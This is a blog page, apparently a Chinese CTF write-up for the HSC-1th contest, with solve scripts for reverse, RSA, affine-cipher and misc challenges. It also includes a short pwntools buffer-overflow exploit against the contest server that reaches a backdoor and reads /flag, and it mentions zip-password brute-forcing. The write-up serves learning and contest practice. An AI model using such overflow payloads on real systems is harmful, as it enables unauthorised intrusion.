<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"n9-zqc.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="题目难度中等的比赛">
<meta property="og:type" content="article">
<meta property="og:title" content="HSC-1th">
<meta property="og:url" content="https://n9-zqc.github.io/2022/02/25/HSC-1th/index.html">
<meta property="og:site_name" content="N9-zqc">
<meta property="og:description" content="题目难度中等的比赛">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://n9-zqc.github.io/2022/02/25/HSC-1th/image-20220219180611781.png">
<meta property="og:image" content="https://n9-zqc.github.io/2022/02/25/HSC-1th/eac4b74543a98226aab284e78a82b9014b90ebfb.png">
<meta property="og:image" content="https://n9-zqc.github.io/2022/02/25/HSC-1th/image-20220225101601822.png">
<meta property="article:published_time" content="2022-02-25T02:38:45.000Z">
<meta property="article:modified_time" content="2022-02-25T02:43:21.450Z">
<meta property="article:author" content="N9-zqc">
<meta property="article:tag" content="48小时题目难度中等的比赛">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://n9-zqc.github.io/2022/02/25/HSC-1th/image-20220219180611781.png">

<link rel="canonical" href="https://n9-zqc.github.io/2022/02/25/HSC-1th/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>HSC-1th | N9-zqc</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">N9-zqc</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">有关网络安全的学习笔记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-文章">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>文章</a>

  </li>
        <li class="menu-item menu-item-查找">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>查找</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://n9-zqc.github.io/2022/02/25/HSC-1th/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="N9-zqc">
      <meta itemprop="description" content="主要有关ctf的学习笔记，主攻逆向和Web">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="N9-zqc">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HSC-1th
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-02-25 10:38:45 / Modified: 10:43:21" itemprop="dateCreated datePublished" datetime="2022-02-25T10:38:45+08:00">2022-02-25</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>题目难度中等的比赛</p>
<span id="more"></span>

<h4 id="HSC-1th-wp"><a href="#HSC-1th-wp" class="headerlink" title="**HSC-1th **wp"></a>**HSC-1th **wp</h4><h4 id="参赛账号：n9-排名：29"><a href="#参赛账号：n9-排名：29" class="headerlink" title="参赛账号：n9 排名：29"></a>参赛账号：n9 排名：29</h4><h5 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h5><h6 id="CLICK"><a href="#CLICK" class="headerlink" title="CLICK"></a>CLICK</h6><p>将页面保存拿下来，用flag查找工具可以找到ZmxhZ3tkYzc2MWQ4Ny00OGJjLTRhN2YtODU2My1jMzc1MDQ4N2M5Zjh9Cg==，用base64解码可得flag{dc761d87-48bc-4a7f-8563-c3750487c9f8}</p>
<h6 id="Web-sign-in"><a href="#Web-sign-in" class="headerlink" title="Web-sign in"></a>Web-sign in</h6><p>1.网址后加/robots.txt可以找到Disallow: fiag_ls_h3re.php</p>
<p>2.打开发现查看源代码禁用，网址前加view-source:也可以查看源代码，最终找到flag{5a163d35-10a2-46b4-9763-920152029e9f}</p>
<h5 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h5><h6 id="hiahia-o-▽-┛"><a href="#hiahia-o-▽-┛" class="headerlink" title="hiahia o(^▽^)┛"></a>hiahia o(<em>^▽^</em>)┛</h6><p>很简单的直接加密，用ida反编译，根据反编译的代码结果可以得出解题代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">key=<span class="string">&quot;igdb~Mumu@p&amp;&gt;%;%&lt;$&lt;p&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">    <span class="keyword">if</span>(i&gt;<span class="number">9</span>):</span><br><span class="line">        <span class="keyword">if</span>(i&amp;<span class="number">1</span>==<span class="number">0</span>):</span><br><span class="line">            flag=<span class="built_in">chr</span>(<span class="built_in">ord</span>(key[i])-<span class="number">11</span>)</span><br><span class="line">        <span class="keyword">if</span>(i%<span class="number">2</span>==<span class="number">1</span>):</span><br><span class="line">            flag = <span class="built_in">chr</span>(<span class="built_in">ord</span>(key[i])+ <span class="number">13</span>)</span><br><span class="line">        <span class="built_in">print</span>(flag)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">if</span> (i &amp; <span class="number">1</span> == <span class="number">0</span>):</span><br><span class="line">            flag= <span class="built_in">chr</span>(<span class="built_in">ord</span>(key[i]) - <span class="number">3</span>)</span><br><span class="line">        <span class="keyword">if</span> (i % <span class="number">2</span> == <span class="number">1</span>):</span><br><span class="line">            flag = <span class="built_in">chr</span>(<span class="built_in">ord</span>(key[i]) + <span class="number">5</span>)</span><br><span class="line">        <span class="built_in">print</span>(flag)</span><br><span class="line"><span class="comment">#flag&#123;RrrrEe33202111&#125;</span></span><br></pre></td></tr></table></figure>

<p>所以是flag{RrrrEe33202111}</p>
<h6 id="ANDROID"><a href="#ANDROID" class="headerlink" title="ANDROID"></a>ANDROID</h6><p>简单的apk逆向，直接用jadx-dui打开查看mainactivity的代码：</p>
<p>发现其是数组奇数位异或i，偶数位异或数组的i+1，那就先将奇数位求出，再算偶数位，py代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#iArr = [102, 13, 99, 28, 127, 55, 99, 19, 109, 1, 121, 58, 83, 30, 79, 0, 64, 42]</span></span><br><span class="line">iArr2 = [<span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">42</span>]</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;for i in range(17):</span></span><br><span class="line"><span class="string">    if(i%2==0):</span></span><br><span class="line"><span class="string">        print(iArr[i]^1)&quot;&quot;&quot;</span></span><br><span class="line"><span class="comment">#得出奇数位代码</span></span><br><span class="line">iArr = [<span class="number">102</span>, <span class="number">13</span>, <span class="number">97</span>, <span class="number">28</span>, <span class="number">123</span>, <span class="number">55</span>, <span class="number">101</span>, <span class="number">19</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">115</span>, <span class="number">58</span>, <span class="number">95</span>, <span class="number">30</span>, <span class="number">65</span>, <span class="number">0</span>, <span class="number">80</span>, <span class="number">42</span>] <span class="comment">#得出奇数位代码后的数组</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;102,97,123,101,101,115,95,65,80&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;for i in range(17):</span></span><br><span class="line"><span class="string">    if(i%2==0):</span></span><br><span class="line"><span class="string">        print(iArr[i]^i)&quot;&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">17</span>):</span><br><span class="line">    <span class="keyword">if</span>(i%<span class="number">2</span>!=<span class="number">0</span>):</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">chr</span>(iArr[i]^iArr[i+<span class="number">1</span>]))</span><br><span class="line"><span class="comment">#得出偶数位代码</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;fa&#123;ees_AP&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;lgRvre_P&quot;&quot;&quot;</span></span><br><span class="line"><span class="comment">#奇数和偶数一个一个的叠加可得flag&#123;Reverse__APP&#125;</span></span><br></pre></td></tr></table></figure>

<p>所以是flag{Reverse__APP}</p>
<h6 id="WAY"><a href="#WAY" class="headerlink" title="WAY"></a>WAY</h6><p>1.查壳发现有upx壳，工具脱壳。</p>
<p>2.这是一个迷宫题，找到迷宫，ida看到数组中5数字，猜测应该是5个一排，碰到I结束，一直到#结束，所以迷宫如下</p>
<p>OIIII<br>OOIO#<br>IOOOI<br>IOIOI<br>IIIII</p>
<p>3.这样就可以得到路径sdsddwd，py代码计算md5（注意flag是小写的）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">m = hashlib.md5()</span><br><span class="line">m.update(<span class="string">b&#x27;sdsddwd&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(m.hexdigest())</span><br><span class="line"><span class="comment">#flag&#123;6654b3343f6f3f6223a721e7f65e87f8&#125;</span></span><br></pre></td></tr></table></figure>

<p>所以是flag{6654b3343f6f3f6223a721e7f65e87f8}</p>
<h5 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h5><h6 id="Easy-SignIn"><a href="#Easy-SignIn" class="headerlink" title="Easy SignIn"></a>Easy SignIn</h6><p>16进制转字符串，再base64解密，再base32解密，再base64可以得到flag{welc0me_to_my_s1gn_in}</p>
<h6 id="RSA"><a href="#RSA" class="headerlink" title="RSA"></a>RSA</h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">n = <span class="number">124689085077258164778068312042204623310499608479147230303784397390856552161216990480107601962337145795119702418941037207945225700624828698479201514402813520803268719496873756273737647275368178642547598433774089054609501123610487077356730853761096023439196090013976096800895454898815912067003882684415072791099101814292771752156182321690149765427100411447372302757213912836177392734921107826800451961356476403676537015635891993914259330805894806434804806828557650766890307484102711899388691574351557274537187289663586196658616258334182287445283333526057708831147791957688395960485045995002948607600604406559062549703501</span></span><br><span class="line">t = <span class="number">10</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(-<span class="number">1000000</span>, <span class="number">1000000</span>):</span><br><span class="line">    x = gmpy2.iroot(k ** <span class="number">2</span> + <span class="number">4</span> * t * n, <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> x[<span class="number">1</span>]:</span><br><span class="line">        p = (-k + x[<span class="number">0</span>]) // (<span class="number">2</span> * t)</span><br><span class="line">        q = t * p + k</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> long_to_bytes, bytes_to_long</span><br><span class="line"></span><br><span class="line">phi = (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">e = <span class="number">57742</span></span><br><span class="line">c = <span class="number">57089349656454488535971268237112640808678921972499308620061475860564979797594115551952530069277022452969364212192304983697546604832633827546853055947447207342333989645243311993521374600648715233552522771885346402556591382705491510591127114201773297304492218255645659953740107015305266722841039559992219190665868501327315897172069355950699626976019934375536881746570219967192821765127789432830133383612341872295059056728626931869442945556678768428472037944494803103784312535269518166034046358978206653136483059224165128902173951760232760915861623138593103016278906012134142386906130217967052002870735327582045390117565</span></span><br><span class="line"></span><br><span class="line">t = gmpy2.gcd(e, phi)</span><br><span class="line">d = gmpy2.invert(e // t, phi)</span><br><span class="line">m = <span class="built_in">pow</span>(c, d, n)</span><br><span class="line">msg = gmpy2.iroot(m, t)</span><br><span class="line"><span class="keyword">if</span> msg[<span class="number">1</span>]:</span><br><span class="line">    <span class="built_in">print</span>(long_to_bytes(msg[<span class="number">0</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;6d22773623d3d5c871692e9985de5f16&#125;</span></span><br></pre></td></tr></table></figure>

<p>根据py代码可以得到以上脚本。</p>
<h6 id="AFFINE"><a href="#AFFINE" class="headerlink" title="AFFINE"></a>AFFINE</h6><p>解密算法：m = a^-1(m - b) (mod n)（注：a^用_a表示）</p>
<p>仿射密码解密：爆破a：0-50，b：0-50，因为asert说明爆破出来的需要有flag。最终得到a=44,b=17,明文:’Oh62Affine1sSti1lN0tSecureEnoughToProtectflag，再算其md5，可得flag。代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line">letter=string.ascii_letters+string.digits</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;def encrypt(m, c, a, b):</span></span><br><span class="line"><span class="string">    for i in range(len(m)):</span></span><br><span class="line"><span class="string">        ch=m[i]</span></span><br><span class="line"><span class="string">        t=(letter.index(ch) * a + b) % 62</span></span><br><span class="line"><span class="string">        c.append(letter[t])</span></span><br><span class="line"><span class="string">    d = &#x27;&#x27;.join(c)</span></span><br><span class="line"><span class="string">    print(d)&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decrypt</span>(<span class="params">m, c, a, b</span>):</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(m)):</span><br><span class="line">        ch=m[i]</span><br><span class="line">        t=((letter.index(ch)-b) * (a^-<span class="number">1</span>)) % <span class="number">62</span></span><br><span class="line">        c.append(letter[t])</span><br><span class="line">    d = <span class="string">&#x27;&#x27;</span>.join(c)</span><br><span class="line">    <span class="keyword">return</span> d</span><br><span class="line"></span><br><span class="line">m=<span class="string">&quot;xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv&quot;</span></span><br><span class="line">c = []</span><br><span class="line"><span class="keyword">for</span> a <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> b <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">50</span>):</span><br><span class="line">        m = <span class="string">&quot;xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv&quot;</span></span><br><span class="line">        c=[]</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;flag&quot;</span> <span class="keyword">in</span> decrypt(m,c,a,b)):</span><br><span class="line">            <span class="built_in">print</span>(decrypt(m,c,a,b),a,b)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;print(&quot;加密后的密文为：&quot;)</span></span><br><span class="line"><span class="string">Cipher = encrypt(m, c, a, b)</span></span><br><span class="line"><span class="string">flag = hashlib.md5(&quot;&quot;.join(str(m)).encode(&quot;utf8&quot;)).hexdigest()&quot;&quot;&quot;</span></span><br><span class="line"><span class="comment">#print(flag)</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">加密后的密文为：</span></span><br><span class="line"><span class="string">xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="comment">#Oh62Affine1sSti1lN0tSecureEnoughToProtectflagOh62Affine1sSti1lN0tSecureEnoughToProtectflag 44 17</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">m = hashlib.md5()</span><br><span class="line">m.update(<span class="string">b&#x27;Oh62Affine1sSti1lN0tSecureEnoughToProtectflag&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(m.hexdigest())</span><br><span class="line"><span class="comment">#flag&#123;2b9b99caae1cc49e5b5aacbc8cc22350&#125;</span></span><br></pre></td></tr></table></figure>

<h5 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h5><h6 id="Sign-in"><a href="#Sign-in" class="headerlink" title="Sign-in"></a>Sign-in</h6><p>关注公共号发消息可得flag。</p>
<h6 id="DORAEMON"><a href="#DORAEMON" class="headerlink" title="DORAEMON"></a>DORAEMON</h6><p>1.暴力破解zip文件密码可以得到密码376852</p>
<p>2.解压并打开图片，用010将图片高度改为600，可以看到一个二维码，补全定位符，扫描可得flag</p>
<p><img src="/2022/02/25/HSC-1th/image-20220219180611781.png" alt="image-20220219180611781"></p>
<p>flag{sing1emak3r10v3m!sc}</p>
<h5 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h5><h6 id="Ez-pwn"><a href="#Ez-pwn" class="headerlink" title="Ez_pwn"></a>Ez_pwn</h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = remote(<span class="string">&quot;hsc2019.site&quot;</span>,<span class="number">10234</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">72</span>+<span class="string">&#x27;\x45\x07\x40\x00\x00\x00\x00\x00&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>运行输入aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaE@   </p>
<p>可以得到执行后门权限，直接cat /flag,得到flag{b512e43b-3770-4553-8849-49512f5d0ce2}</p>
<h4 id="以此为分割线，以上是自己做出的，以下是复现的。"><a href="#以此为分割线，以上是自己做出的，以下是复现的。" class="headerlink" title="以此为分割线，以上是自己做出的，以下是复现的。"></a>以此为分割线，以上是自己做出的，以下是复现的。</h4><h5 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h5><h6 id="汝闻-人言否"><a href="#汝闻-人言否" class="headerlink" title="汝闻,人言否"></a>汝闻,人言否</h6><p>1.下载解压，得到图片，010打开，文件尾有KP开头，修改，图片的尾部也有KP开头，将其修改，修改完后提取为.zip，并用工具修复一下，可以得到压缩包，发现图片尾部有qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p发现是键盘密码，得到WVALOU，A不好得到可用掩码爆破，掩码处填写WVA?LOU</p>
<p>2.得到压缩包内容，发现是RIFF开头的，修改为.wav，弄为频谱图可以得到flag：</p>
<p>flag{e5353bb7b57578bd4da1c898a8e2d767}</p>
<h6 id="PERFORMANCE-ART"><a href="#PERFORMANCE-ART" class="headerlink" title="PERFORMANCE-ART"></a>PERFORMANCE-ART</h6><p>标准银河字母</p>
<p>打开图片发现是银河密码，对照着手动解一下，其他的看着像是数字将所有的一个个翻译一<br>遍得到（图片上有的看像是数字，直接翻译为数字）</p>
<p>可以得到：</p>
<p>50 4B 03 04 14 00 00 00 08 00 4A 7E 72 53 14 8E<br>1E 1E 16 00 00 00 14 00 00 00 06 00 00 00 75 6E<br>6B 6E 6F 77 8B CA AD C8 88 32 2E C9 F3 0B 75 2D<br>F7 0C CF AE 8C CA 72 B3 04 00 50 4B 01 02 00 00<br>14 00 00 00 08 00 4A 7E 72 53 14 8E 1E 1E 16 00<br>00 00 14 00 00 00 06 00 00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00 75 6E 6B 6E 6F 77 50 4B<br>05 06 00 00 00 00 01 00 01 00 34 00 00 00 3A 00<br>00 00 00 00</p>
<p>修改为.zip文件，解压可得flag</p>
<h5 id><a href="#" class="headerlink" title></a><img src="/2022/02/25/HSC-1th/eac4b74543a98226aab284e78a82b9014b90ebfb.png" alt="eac4b74543a98226aab284e78a82b9014b90ebfb"></h5><h6 id="WIRESHARK"><a href="#WIRESHARK" class="headerlink" title="WIRESHARK"></a>WIRESHARK</h6><p>1.用foremost分离得到png和zip文件。</p>
<p>2.<img src="/2022/02/25/HSC-1th/image-20220225101601822.png" alt="image-20220225101601822"></p>
<p>LSB隐写，用save bin得到png图片，扫描发现wrsak..iehr370，栅栏密码2，得到zip密码wireshark3.7.0，解压zip文件（zip文件要修复一下）。打开文件发现文件尾部是%%EOF，所以是pdf文件，修改文件头255044462D312E，得到pdf文件，用wbstego4.3open软件decode得到flag{Go0dJ0B_y0ufIndLt}</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/48%E5%B0%8F%E6%97%B6%E9%A2%98%E7%9B%AE%E9%9A%BE%E5%BA%A6%E4%B8%AD%E7%AD%89%E7%9A%84%E6%AF%94%E8%B5%9B/" rel="tag"># 48小时题目难度中等的比赛</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/02/20/VNCTF2022%E5%85%AC%E5%BC%80%E8%B5%9B/" rel="prev" title="VNCTF2022公开赛">
      <i class="fa fa-chevron-left"></i> VNCTF2022公开赛
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#HSC-1th-wp"><span class="nav-number">1.</span> <span class="nav-text">**HSC-1th **wp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%82%E8%B5%9B%E8%B4%A6%E5%8F%B7%EF%BC%9An9-%E6%8E%92%E5%90%8D%EF%BC%9A29"><span class="nav-number">2.</span> <span class="nav-text">参赛账号：n9 排名：29</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Web"><span class="nav-number">2.1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#CLICK"><span class="nav-number">2.1.1.</span> <span class="nav-text">CLICK</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#Web-sign-in"><span class="nav-number">2.1.2.</span> <span class="nav-text">Web-sign in</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Reverse"><span 